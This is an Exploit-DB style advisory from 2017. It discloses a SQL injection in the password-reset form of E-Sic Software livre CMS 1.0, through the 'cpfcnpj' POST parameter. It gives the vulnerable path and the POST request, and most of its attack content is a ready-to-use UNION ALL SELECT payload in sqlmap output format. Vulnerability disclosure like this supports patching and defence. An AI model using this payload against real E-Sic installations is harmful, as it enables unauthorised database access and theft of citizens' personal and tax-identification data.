E-Sic Software livre CMS - 'cpfcnpj' SQL Injection

Author: Elber Tavares
type: webapps
platform: php
port: 
date_added: 2017-10-13 
date_updated: 2017-10-20 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comesiclivre.rar

# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/

POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar